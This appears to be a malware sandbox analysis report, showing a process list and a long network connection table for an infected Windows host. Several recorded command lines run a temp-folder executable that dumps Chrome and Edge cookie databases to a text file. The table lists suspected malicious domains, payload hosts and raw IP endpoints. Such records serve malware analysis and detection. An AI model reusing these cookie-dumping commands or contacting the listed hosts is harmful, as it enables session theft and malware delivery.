"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1340 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | tcp | |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 52.242.101.226:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.126.31.135:443 | tcp | |
| N/A | 52.247.37.26:80 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | tcp | |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 8.8.8.8:53 | fsstoragecloudservice.com | udp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.64.107:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 52.219.64.107:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 186.2.171.3:80 | 186.2.171.3 | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.64.38:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 144.202.76.47:443 | www.listincode.com | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 188.40.106.215:80 | s3.tebi.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 8.8.8.8:53 | ingstorage.com | udp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 8.8.8.8:53 | duzlwewk2uk96.cloudfront.net | udp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 8.8.8.8:53 | statuse.digitalcertvalidation.com | udp |
| N/A | 52.222.137.124:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 72.21.91.29:80 | statuse.digitalcertvalidation.com | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.158.10:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 172.67.161.96:443 | bb.goatggame.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.219.158.10:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 151.139.128.14:80 | crl.comodoca.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.75.219:80 | proxycheck.io | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 52.219.62.75:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.62.75:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 31.31.198.230:80 | u1452023.cp.regruhosting.ru | tcp |
| N/A | 195.2.78.163:25450 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 151.139.128.14:80 | crl.comodoca.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 188.124.36.242:25802 | 188.124.36.242 | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 151.139.128.14:80 | crl.comodoca.com | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 95.181.172.100:55640 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 72.21.91.29:80 | crl4.digicert.com | tcp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 66.29.130.154:80 | perfect-request-smart.com | tcp |
| N/A | 104.21.22.140:443 | download-serv-234116.xyz | tcp |
| N/A | 77.83.175.169:11490 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 193.56.146.22:47861 | tcp | |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 62.172.138.35:80 | geo.netsupportsoftware.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
